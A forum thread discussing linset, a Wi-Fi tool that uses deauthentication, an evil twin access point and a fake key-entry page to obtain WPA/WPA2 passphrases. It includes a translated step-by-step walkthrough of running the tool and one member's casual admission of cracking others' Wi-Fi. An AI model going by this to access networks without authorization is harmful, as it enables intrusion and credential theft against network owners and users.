WPA crack NON-BRUTEFORCE!

CyberscumCyberscum Member Posts: 795 ■■■■■□□□□□
So I ran across a new (2014 release) WPA cracking tool called linset for Kali. Does not use brute force techniques to crack the WPA, It has a very interesting way of capturing the handshake.

The problem is that I believe it was originally written in Spanish. Has anyone played with this or have a good English tutorial to follow?

Here is some general info on it if anyone is interested:


http://www.google.com/url?url=http://black-hat-sec.org/index.php%3Ftopic%3D87.0&rct=j&frm=1&q=&esrc=s&sa=U&ei=XumvVOCBBYysyASUv4HQBg&ved=0CCgQFjAE&usg=AFQjCNH-8W6xpJ8kzcJLJi-LDIyYw6bDJg


https://www.youtube.com/watch?v=dBDDKTbGpgE

Comments

  • the_Grinchthe_Grinch Member Posts: 4,165 ■■■■■■■■■■
    Pretty interesting, I'm surprised the community hasn't come together and translated it to English.
    WIP:
    PHP
    Kotlin
    Intro to Discrete Math
    Programming Languages
    Work stuff
  • zoro_2009zoro_2009 Member Posts: 26 ■■■□□□□□□□
    I understand arabic if any one is interested in the youtube video !
  • the_Grinchthe_Grinch Member Posts: 4,165 ■■■■■■■■■■
    zoror_2009 translate it man, I'm sure a lot of people will appreciate it and if you do a video with voiceover you'll probably get a ton of hits on YouTube
    WIP:
    PHP
    Kotlin
    Intro to Discrete Math
    Programming Languages
    Work stuff
  • CyberscumCyberscum Member Posts: 795 ■■■■■□□□□□
    the_Grinch wrote: »
    Pretty interesting, I'm surprised the community hasn't come together and translated it to English.

    They might have, I just cant find anything...I want to really try this out
  • ryanw4130ryanw4130 Member Posts: 18 ■□□□□□□□□□
    I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol
  • CyberscumCyberscum Member Posts: 795 ■■■■■□□□□□
    ryanw4130 wrote: »
    I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol

    Define what you mean by WPA2 has not been cracked (AES?...It has)

    Linset can be used on WPA/2

    It is not a traditional "crack" you are thinking of...Oh and Aircrack can do something "similar" to this using "Evil Twin" method
  • LeBrokeLeBroke Member Posts: 490 ■■■■□□□□□□
    I'm assuming this is not resource intensive and can be run on a potato? If so, it'd be awesome.
  • zoro_2009zoro_2009 Member Posts: 26 ■■■□□□□□□□
    Well I looked at the video and there is nothing he sais (no vocal), and the text is nothing but an introduction of what linset is and what it does !
    The rest of the video is for the installation only of Linset !
    Then in the last seconds of the video, he sais that he will make another video of how to configure and work with the tool !
  • jaywalkerjaywalker Member Posts: 90 ■■■□□□□□□□
    From what I've understood and read so far, the handshake is captured through deauthentication of client/s (using the aircrack-ng suite). The "non brute force" part of the attack = getting those deauthed clients to connect to your evil twin, and hoping they'd be dumb enough to enter their login credentials on the fake login page.

    My assumption is that if the victim does not enter any login information, the handshake cannot be 'checked' against the phished credentials.

    Sources Used:
    Linset's github page (English):
    https://github.com/vk496/linset

    LINSET 0.14 - WPA/2 Hack sin Fuerza Bruta (Spanish):
    LINSET 0.14 - WPA/2 Hack sin Fuerza Bruta

    Similar to linset icon_cool.gif
    https://github.com/sophron/wifiphisher
    Goals for 2015: ICND1 [], ICND2 []


    ..........:cheers:
    A winner is you
  • ibn_shaddadibn_shaddad Member Posts: 57 ■■□□□□□□□□
    I found this:
    شرØ* اداة Linset لجلب باسورد الوايرلس - توزيعة Wifislax - TECH-SECU تقنيات الØ*ماية

    It is in Arabic, so I will try my best in translating:

    بسم الله الرحمن الرحيم

    The tool linset, this tool is considered very dangerous where you can easily one it's victims and you (the victim) can't figure what happened, it is one of the available tools that come with distro Wifislax

    The principle behind this tool that it connects to the victim rig and creates an unreal network to deceive him, and pushes a pop up message asking him to enter the pre-shared key one more time to continue the connection, and it looks very much like the fake login pages, but this one still unknown for WiFi users

    note: to install the distro click here

    To open the tool from wifislax, we go to the main menu and choose wifislax then WPA then linset as shown in the following picture.


    1.png
    after openning we will see a list of available interfaces, as you see we have wlan0, then we choose number 1


    2.png

    now another screen, also choose 1 and continue


    3.png



    then a new screen, and it will start searching for nearby networks

    4.png

    after finishing, it will show all the bearby networks and with every one a number as you can see, and we can notice the a star is located on every network that already has a user, now choose the network number and press enter


    5.png

    now press 1 and enter

    6.png

    again 1 and enter

    7.png


    now here we wait the tool to grab the handshake and that is the goal, after we have it, close the window


    8.png

    after closing the window, we will have the following screen, press 1 and continue

    9.png

    now a screen wil show to ask you to choose what language you want to use in the popup message the victim will see, choose what you want and continue

    10.png

    the following scrren will appear, just wait...

    11.png

    good, now as we can notice in the following pic, it says "key found" and give it to us

    12.png


    Working on: CCNA R&S, CCNA Sec, Security+
    Learning: Python, C and C++
  • ibn_shaddadibn_shaddad Member Posts: 57 ■■□□□□□□□□
    are you sure we are not breaking any rules here by posting such things?
    Working on: CCNA R&S, CCNA Sec, Security+
    Learning: Python, C and C++
  • NovaHaxNovaHax Member Posts: 502 ■■■■□□□□□□
    Nothing particularly ground-breaking here. Based on some Google Translate pages :-/...it looks like it still relies on a dictionary attack for cracking the EAPOL handshake. And an evil twin capture of the handshake is easy to do with airbase.

    Wi-Fu - WPA2-PSK Evil Twin Attack

    I did see a screenshot of what may be another option in LINSET that creates a fake access point (presumably with no encryption) and then forces anyone that connects to the attacker hosted AP to web content that asks for a WPA/WPA2 key and then just strips it from the HTTP POST response (in clear-text...thereby avoiding the need to crack the handshake), if the person is dumb enough to do it. It looks absolutely NOTHING like actual WPA authentication...but people are stupid...so I'm sure it still works frequently. But this is a social engineering attack...its not a new technical crack. Its the technical equivalent of going up and asking someone what the passphrase is.
  • DeathmageDeathmage Banned Posts: 2,496
    I use Aircrack all the time, comes in handy sometimes when I want to connect to wireless but I don't know the password, just power on my VMware workstation on my laptop, spin up Ubuntu and run the program and wait like 10 minutes. you'd be surprised how simple most wireless password's are...

    I used to do aircrack back in college for clients to gauge how strong there wireless password was and to teach them on how to make it stronger and harder to crack. I was a Whitehat well before I even knew what the term even meant...

    Whitehat hacking is something I've always wanted to do, I'm just just too busy getting into a niche of system administration since that to me were the money is, but I'm sure security focused hackers make good mulla......someday..
  • lsud00dlsud00d Member Posts: 1,571
    are you sure we are not breaking any rules here by posting such things?

    As long as everyone understands this is for research purposes only and not used for nefarious reasons, then there is no problem having a scholarly discussion on cracking wifi :)

    Also, I lol'd at LINSET's name...taking a page from GNU
  • VIDEODROMEVIDEODROME Member Posts: 30 ■■□□□□□□□□
    I've heard some programs work by exploiting WPS rather than cracking the password. I wonder if this is something like that.
Sign In or Register to comment.